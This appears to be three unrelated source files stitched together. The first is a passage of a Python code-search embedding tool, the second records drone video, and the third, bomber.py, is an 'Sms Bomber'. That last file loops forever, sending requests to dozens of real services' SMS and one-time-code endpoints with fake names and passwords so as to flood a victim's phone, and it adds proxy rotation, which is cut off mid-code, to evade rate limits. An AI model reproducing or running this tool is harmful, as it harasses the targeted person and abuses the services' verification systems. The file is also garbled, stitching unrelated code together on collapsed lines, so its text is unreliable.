        """Load the transferred target-domain (Python) use features."""
        logger.info('Loading use data..')
        logger.info('methname')
        methnames = self.load_hdf5(self.target_transferred_methnames, 0, -1)
        logger.info('apiseq')
        apiseqs = self.load_hdf5(self.target_transferred_apiseqs, 0, -1)
        logger.info('tokens')
        tokens = self.load_hdf5(self.target_transferred_tokens, 0, -1)
        return methnames, apiseqs, tokens

    # NOTE(review): the original file defined load_transferred_pycode_reprs
    # twice; the first definition used the never-initialized attribute
    # `self._pycode_reprs` (AttributeError) and was shadowed by the later
    # definition, so only the working one is kept (further below).

    def load_use_python_data(self):
        """Load the pickled Python 'use' features."""
        logger.info('Loading use python data..')
        logger.info('python methname')
        methnames = self.load_pickle(self.py_use_methname)
        logger.info('python apiseq')
        apiseqs = self.load_pickle(self.py_use_apiseq)
        logger.info('python tokens')
        tokens = self.load_pickle(self.py_use_token)
        return methnames, apiseqs, tokens

    def load_pycode_reprs(self):
        """Read Python code vectors (2-D array) from HDF5, chunked."""
        logger.debug('Loading python code vectors (chunk size={})..'.format(self._code_base_chunksize))
        if self._code_reprs is None:
            codereprs = []
            h5f = tables.open_file(self.py_use_codevec)
            vecs = h5f.root.vecs
            for i in range(0, len(vecs), self._code_base_chunksize):
                codereprs.append(vecs[i:i + self._code_base_chunksize])
            h5f.close()
            self._code_reprs = codereprs
        return self._code_reprs

    def repr_python_code(self, model):
        """Embed the Python 'use' corpus and persist the vectors."""
        methnames, apiseqs, tokens = self.load_use_python_data()
        padded_methnames = self.pad(methnames, self.data_params['methname_len'])
        padded_apiseqs = self.pad(apiseqs, self.data_params['apiseq_len'])
        padded_tokens = self.pad(tokens, self.data_params['tokens_len'])
        vecs = model.repr_code([padded_methnames, padded_apiseqs, padded_tokens], batch_size=1000)
        vecs = vecs.astype('float32')
        self.save_code_reprs(vecs, self.py_use_codevec)
        return vecs

    def load_transferred_pycode_reprs(self):
        """Read transferred Python code vectors (2-D array) from HDF5."""
        logger.debug('Loading transferred python code vectors (chunk size={})..'.format(self._code_base_chunksize))
        if self._code_reprs is None:
            codereprs = []
            h5f = tables.open_file(self.py_transferred_use_codevec)
            vecs = h5f.root.vecs
            for i in range(0, len(vecs), self._code_base_chunksize):
                codereprs.append(vecs[i:i + self._code_base_chunksize])
            h5f.close()
            self._code_reprs = codereprs
        return self._code_reprs

    def repr_transferred_python_code(self, model):
        """Embed the transferred Python corpus and persist the vectors."""
        methnames, apiseqs, tokens = self.load_use_transferred_python_data()
        padded_methnames = self.pad(methnames, self.data_params['methname_len'])
        padded_apiseqs = self.pad(apiseqs, self.data_params['apiseq_len'])
        padded_tokens = self.pad(tokens, self.data_params['tokens_len'])
        vecs = model.repr_code([padded_methnames, padded_apiseqs, padded_tokens], batch_size=1000)
        vecs = vecs.astype('float32')
        self.save_code_reprs(vecs, self.py_transferred_use_codevec)
        return vecs

    def preprocess(self, model):
        """Parse every snippet in the Python codebase into (token, methname,
        apiseq) index vectors and persist them plus the raw code list.
        Snippets that fail to parse are skipped.
        """
        cv = self.cv
        py_codebase = self.py_codebase
        code_list = []
        token_list = []
        methname_list = []
        apiseq_list = []

        print("==================================================================================================")
        print("Embedding...")
        for key in py_codebase.keys():
            code = py_codebase.get(key)
            try:
                token = cv.getToken(code)
                methodname = cv.getMethodName(code)
                apiSequence = cv.getAPISequence(code)
            except Exception:
                # unparsable snippet -- skip it (original behavior)
                continue
            else:
                token_list.append(self.convert(self.vocab_tokens, token))
                methname_list.append(self.convert(self.vocab_methname, methodname))
                apiseq_list.append(self.convert(self.vocab_apiseq, apiSequence))
                code_list.append(code)

        with open(self.py_use_rawcode, "wb") as raw_code:
            pickle.dump(code_list, raw_code)
        print("Embedding completed.")
        print("Saving...")
        self.save_pkl(token_list, self.py_use_token)
        self.save_pkl(methname_list, self.py_use_methname)
        self.save_pkl(apiseq_list, self.py_use_apiseq)
        print("Saved.")

    def save_pkl(self, data, filename):
        """Pickle *data* to *filename*."""
        with open(filename, 'wb') as f:
            pickle.dump(data, f)

    '''
    =======================================
    Transfer
    '''
    def transfer(self, method="TCA", source_size=5000, target_size=2000):
        """Run transfer-component analysis between the Java (source) and
        Python (target) feature spaces and persist the transferred splits.

        The inputs are truncated to source_size/target_size because the full
        arrays are too large and would cause a memory error.
        """
        Xs = []
        Xt = []
        print("Transfering Source Data ...")
        methnames, apiseqs, tokens = self.load_use_data()
        py_methnames, py_apiseqs, py_tokens = self.load_use_python_data()

        methnames = methnames[0:source_size]
        apiseqs = apiseqs[0:source_size]
        tokens = tokens[0:source_size]
        py_methnames = py_methnames[0:target_size]
        py_apiseqs = py_apiseqs[0:target_size]
        py_tokens = py_tokens[0:target_size]

        m_len = self.data_params['methname_len']
        a_len = self.data_params['apiseq_len']
        t_len = self.data_params['tokens_len']

        padded_methnames = self.pad(methnames, m_len)
        padded_apiseqs = self.pad(apiseqs, a_len)
        padded_tokens = self.pad(tokens, t_len)
        padded_py_methnames = self.pad(py_methnames, m_len)
        padded_py_apiseqs = self.pad(py_apiseqs, a_len)
        padded_py_tokens = self.pad(py_tokens, t_len)

        # one flat feature row per example: [methname | apiseq | tokens]
        for i in range(len(padded_methnames)):
            Xs.append(np.concatenate((padded_methnames[i], padded_apiseqs[i], padded_tokens[i]), axis=0))
        for j in range(len(padded_py_methnames)):
            Xt.append(np.concatenate((padded_py_methnames[j], padded_py_apiseqs[j], padded_py_tokens[j]), axis=0))
        Xs = np.array(Xs)
        Xt = np.array(Xt)

        if method == "TCA":
            from TCA import TCA
            tca = TCA(Xs, Xt, dim=m_len + a_len + t_len)
            Xs_new, Xt_new = tca.fit()
            # Xs_new cannot contain any negative value
            Xs_new = np.add(Xs_new, 10)
            Xt_new = np.add(Xt_new, 10)
        else:
            print("Unknown Transfer")
            return
        print("Transfer Completed")

        # Fix: the original sliced the segments with wrong bounds
        # ([m:a] and [a:t] instead of [m:m+a] and [m+a:m+a+t]) and computed
        # the *target* splits from Xs_new instead of Xt_new.
        source_methnames_new = Xs_new[:, 0:m_len]
        source_apiseqs_new = Xs_new[:, m_len:m_len + a_len]
        source_tokens_new = Xs_new[:, m_len + a_len:m_len + a_len + t_len]
        self.save_h5file(source_methnames_new, self.source_transferred_methnames)
        self.save_h5file(source_apiseqs_new, self.source_transferred_apiseqs)
        self.save_h5file(source_tokens_new, self.source_transferred_tokens)

        target_methnames_new = Xt_new[:, 0:m_len]
        target_apiseqs_new = Xt_new[:, m_len:m_len + a_len]
        target_tokens_new = Xt_new[:, m_len + a_len:m_len + a_len + t_len]
        self.save_h5file(target_methnames_new, self.target_transferred_methnames)
        self.save_h5file(target_apiseqs_new, self.target_transferred_apiseqs)
        self.save_h5file(target_tokens_new, self.target_transferred_tokens)

        #self.save_code_reprs(Xs_new, self.transfer_Xs_new)
        self.save_code_reprs(Xt_new, self.transfer_Xt_new)
        return Xs_new, Xt_new

    def save_h5file(self, X, filename):
        """Write 2-D data *X* to the packed /phrases + /indices HDF5 format."""
        data = _pack2Dto1D(X)
        h5file = open_file(filename, mode='w', title=filename)
        h5file.create_array("/", "phrases", data.astype('float32'), "1D Data array")
        table = h5file.create_table("/", 'indices', Index, 'Index of data')
        index = table.row
        offset = 0
        for i in range(len(X)):
            length = len(X[i])
            index['pos'] = offset
            index['length'] = length
            index.append()
            offset += length
        table.flush()
        h5file.close()


def _pack2Dto1D(X):
    """Flatten a list of 1-D arrays into one concatenated 1-D array."""
    R = []
    for i in X:
        R = np.concatenate((R, i), axis=0)
    return R


def parse_args():
    """Command-line interface for training/evaluating/searching."""
    parser = argparse.ArgumentParser("Train and Test Code Search(Embedding) Model")
    parser.add_argument("--proto", choices=["get_config"], default="get_config",
                        help="Prototype config to use for config")
    parser.add_argument("--mode", choices=["train", "eval", "repr_code", "search",
                                           "repr_python_code", "preprocess",
                                           "search_python", "transfer", "train_transferred",
                                           "repr_transferred_python_code",
                                           "search_transferred_python"],
                        default='train',
                        help="The mode to run."
                             " The `train` mode trains a model;"
                             " the `eval` mode evaluat models in a test set "
                             " The `repr_code/repr_desc` mode computes vectors"
                             " for a code snippet or a natural language description with a trained model.")
    parser.add_argument("--verbose", action="store_true", default=True, help="Be verbose")
    return parser.parse_args()


if __name__ == '__main__':
    args = parse_args()
    conf = getattr(configs, args.proto)()
    codesearcher = CodeSearcher(conf)

    ##### Define model ######
    logger.info('Build Model')
    # NOTE(review): eval() on a config-supplied class name -- the config is
    # trusted/local here, but never feed it untrusted input.
    model = eval(conf['model_params']['model_name'])(conf)  # initialize the model
    model.build()
    optimizer = conf.get('training_params', dict()).get('optimizer', 'adam')
    model.compile(optimizer=optimizer)

    if args.mode == 'train':
        codesearcher.train(model)

    elif args.mode == 'eval':
        # evaluate for a particular epoch
        if conf['training_params']['reload'] > 0:
            codesearcher.load_model_epoch(model, conf['training_params']['reload'])
        codesearcher.eval(model, -1, 10)

    elif args.mode == 'repr_code':
        if conf['training_params']['reload'] > 0:
            codesearcher.load_model_epoch(model, conf['training_params']['reload'])
        vecs = codesearcher.repr_code(model)

    elif args.mode == 'search':
        # search code based on a desc
        if conf['training_params']['reload'] > 0:
            codesearcher.load_model_epoch(model, conf['training_params']['reload'])
        codesearcher.load_code_reprs()
        codesearcher.load_codebase()
        while True:
            try:
                query = input('Input Query: ')
                n_results = int(input('How many results? '))
            except Exception:
                print("Exception while parsing your input:")
                traceback.print_exc()
                break
            codes, sims = codesearcher.search(model, query, n_results)
            zipped = zip(codes, sims)
            results = '\n\n'.join(map(str, zipped))  # combine the result into a returning string
            print(results)

    elif args.mode == 'preprocess':
        codesearcher.preprocess(model)

    elif args.mode == 'repr_python_code':
        codesearcher.repr_python_code(model)

    elif args.mode == 'search_python':
        # search code based on a desc
        if conf['training_params']['reload'] > 0:
            codesearcher.load_model_epoch(model, conf['training_params']['reload'])
        codesearcher.load_pycode_reprs()
        codesearcher.load_python_codebase()
        while True:
            try:
                query = input('Input Query: ')
                n_results = int(input('How many results? '))
            except Exception:
                print("Exception while parsing your input:")
                traceback.print_exc()
                break
            codes, sims = codesearcher.search(model, query, n_results)
            zipped = zip(codes, sims)
            results = '\n\n'.join(map(str, zipped))  # combine the result into a returning string
            print(results)

    elif args.mode == 'transfer':
        codesearcher.transfer("TCA", 10000, 5000)

    elif args.mode == 'repr_transferred_python_code':
        codesearcher.repr_transferred_python_code(model)

    elif args.mode == 'train_transferred':
        codesearcher.train(model, True)

    elif args.mode == 'search_transferred_python':
        # search code based on a desc
        if conf['training_params']['reload'] > 0:
            codesearcher.load_model_epoch(model, conf['training_params']['reload'])
        codesearcher.load_transferred_pycode_reprs()
        codesearcher.load_python_codebase()
        while True:
            try:
                # Fix: the original used Python-2 raw_input(), a NameError
                # on Python 3 (which this file otherwise targets).
                query = input('Input Query: ')
                n_results = int(input('How many results? '))
            except Exception:
                print("Exception while parsing your input:")
                traceback.print_exc()
                break
            codes, sims = codesearcher.search(model, query, n_results)
            zipped = zip(codes, sims)
            results = '\n\n'.join(map(str, zipped))  # combine the result into a returning string
            print(results)
record_video.py
import time
import cv2
from threading import Thread
from djitellopy import Tello

FPS = 30

tello = Tello()
tello.connect()
print("Battery level:", tello.get_battery())

keepRecording = True
tello.streamon()
frame_read = tello.get_frame_read()


def video_recorder():
    """Write drone frames to video.mp4 at ~FPS until keepRecording clears."""
    height, width, _ = frame_read.frame.shape
    video = cv2.VideoWriter('video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), FPS, (width, height))

    try:
        while keepRecording:
            start = time.time()
            video.write(frame_read.frame)
            # Fix: the original slept for `1/FPS - elapsed` unconditionally;
            # when a write takes longer than one frame period that value is
            # negative and time.sleep() raises ValueError, silently killing
            # the recorder thread.  Skip the sleep instead.
            remaining = 1 / FPS - (time.time() - start)
            if remaining > 0:
                time.sleep(remaining)
    finally:
        # release even if the loop raises, so the container is finalized
        video.release()


# we need to run the recorder in a seperate thread, otherwise blocking options
# would prevent frames from getting added to the video
recorder = Thread(target=video_recorder)
recorder.start()

# tello.takeoff()
# tello.move_up(100)
# tello.rotate_counter_clockwise(360)
# tello.land()

start = time.time()
while time.time() - start < 15:
    cv2.imshow("Drone", frame_read.frame)
    cv2.waitKey(1)

keepRecording = False
recorder.join()
tello.end()
bomber.py
import requests, random from requests import get from bs4 import BeautifulSoup as bs import colorama from termcolor import colored from tkinter import filedialog as fd from tkinter import * from tkinter import messagebox from tkinter import Label from random import randint import threading, os, sys, time colorama.init() root = Tk() root.title('Sms Bomber, by HZ') root.geometry('500x400+300+200') def good(): print(colored('SMS sent', 'green')) def error(): print(colored('SMS not sent', 'red')) def spamNOproxy(phone): while True: _name = '' for x in range(12): _name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) _email = _name + '@gmail.com' email = _name + '@gmail.com' _phone = phone _phone9 = _phone[1:] _phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10] _phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _phonePizzahut = '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11] _phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _text = 'Ляля' phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10] phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10] try: requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={}) good() except Exception as e: error() try: requests.post('https://oauth.sovest.ru/oauth/authorize', 
data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9}) good() except Exception as e: error() try: requests.get('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407') good() except Exception as e: error() try: requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', data={'phone':_phone, 'password':password}) good() except Exception as e: error() try: requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'}) good() except Exception as e: error() try: requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'}) good() except Exception as e: error() try: requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'}) good() except Exception as e: error() try: requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://www.rabota.ru/remind', data={'credential': _phone}) good() except Exception as e: error() try: requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'}) good() except Exception as e: error() try: requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', 
params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'}) good() except Exception as e: error() try: requests.post('https://newnext.ru/graphql', json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'}) good() except Exception as e: error() try: requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'}) good() except Exception as e: error() try: requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'}) good() except Exception as e: error() try: requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'}) good() except Exception as e: error() try: requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://plink.tech/register/', json={'phone': _phone}) good() except Exception as e: error() try: 
requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone}) good() except Exception as e: error() try: requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}) good() except Exception as e: error() try: requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username}) good() except Exception as e: error() try: requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'}) good() except Exception as e: error() try: requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone}) good() except Exception as e: error() try: requests.post('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/') good() except Exception as e: error() try: requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone}) good() except Exception as e: error() try: requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email}) good() except Exception as e: error() try: requests.post('https://protovar.com.ua/aj_record', 
data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]}) good() except Exception as e: error() try: requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main&currentLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'}) good() except Exception as e: error() try: requests.post('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11]) good() except Exception as e: error() try: requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]}) good() except Exception as e: error() try: requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}) good() except Exception as e: error() try: requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'}) good() except Exception as e: error() try: requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'}) good() except Exception as e: error() try: requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'}) good() except Exception as e: error() try: requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}) good() except Exception as e: error() try: requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone}) good() except Exception as e: error() try: requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone}) good() except Exception as e: error() try: a = 
requests.get('https://driver.gett.ru/signup/') requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']}) good() except Exception as e: error() try: requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'}) good() except Exception as e: error() try: b = requests.session() b.get('https://drugvokrug.ru/siteActions/processSms.htm') requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'}) good() except Exception as e: error() try: rutaxi = requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]}) good() except Exception as e: error() try: rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone}) good() except Exception as e: error() try: psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 
'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'}) good() except Exception as e: error() try: beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone}) good() except Exception as e: error() try: modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'}) good() except Exception as e: error() try: data = {'form[NAME]':'Иван', 'form[PERSONAL_GENDER]':'M', 'form[PERSONAL_BIRTHDAY]':'11.02.2000', 'form[EMAIL]':'fbhbdfvbd@gmail.com', 'form[LOGIN]':phone1, 'form[PASSWORD]':None, 'get-new-password':'Получите пароль по SMS', 'user_agreement':'on', 'personal_data_agreement':'on', 'formType':'full', 'utc_offset':180} aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data) good() except Exception as e: error() try: tvzavr = requests.post('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49') good() except Exception as e: error() try: cook = requests.post('https://www.netprint.ru/order/profile') headers = {'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection':'keep-alive', 'Content-Length':145, 'Cookie':'unbi=' + cook.cookies['unbi'], 'Host':'www.netprint.ru', 'Origin':'https://www.netprint.ru', 'Referer':'https://www.netprint.ru/order/profile', 'Sec-Fetch-Mode':'cors', 'Sec-Fetch-Site':'same-origin', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48', 'X-Requested-With':'XMLHttpRequest'} netprint = 
requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1}) good() except Exception as e: error() try: requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7}) good() except Exception as e: error() try: requests.get('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en') good() except Exception as e: error() try: requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone', 'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n'}) good() except Exception as e: error() try: requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone, 'SignupForm[device_type]':3}) good() except Exception as e: error() try: requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone, 'locale':'en', 'countryCode':'ru', 'version':'1', 'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'}) good() except Exception as e: error() try: requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request', 'phone':'+' + phone, 'phone_permission':'unknown', 'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown', 'devicemodel':'unknown'}) good() except Exception as e: error() try: password = ''.join(random.choice(string.ascii_letters) for _ in range(6)) requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone}) good() except Exception as e: error() try: requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone}) good() except Exception as e: error() try: requests.get('https://findclone.ru/register?phone=+' + phone) good() except Exception as e: error() try: requests.post('https://mobile.vkusvill.ru:40113/api/user/', 
data={'Phone_number':_phone9, 'version':'2'}, headers={}) good() except Exception as e: error() try: requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={}) good() except Exception as e: error() try: requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={}) good() except Exception as e: error() try: requests.post('https://www.rabota.ru/remind', data={'credential': _phone}) good() except Exception as e: error() try: requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'}) good() except Exception as e: error() try: requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}}) good() except Exception as e: error() try: requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone}) good() except Exception as e: error() try: requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''}) good() except Exception as e: error() try: requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}) good() except Exception as e: error() def spamProxy(phone): while True: def proxy(): with open(file_name) as file: list_proxy = file.read().split('\n') random_proxy_count = randint(0, len(list_proxy) - 1) try: proxies = {'http': list_proxy[random_proxy_count].split(' ')[1]} return proxies except: proxies = {'http': list_proxy[(random_proxy_count - 
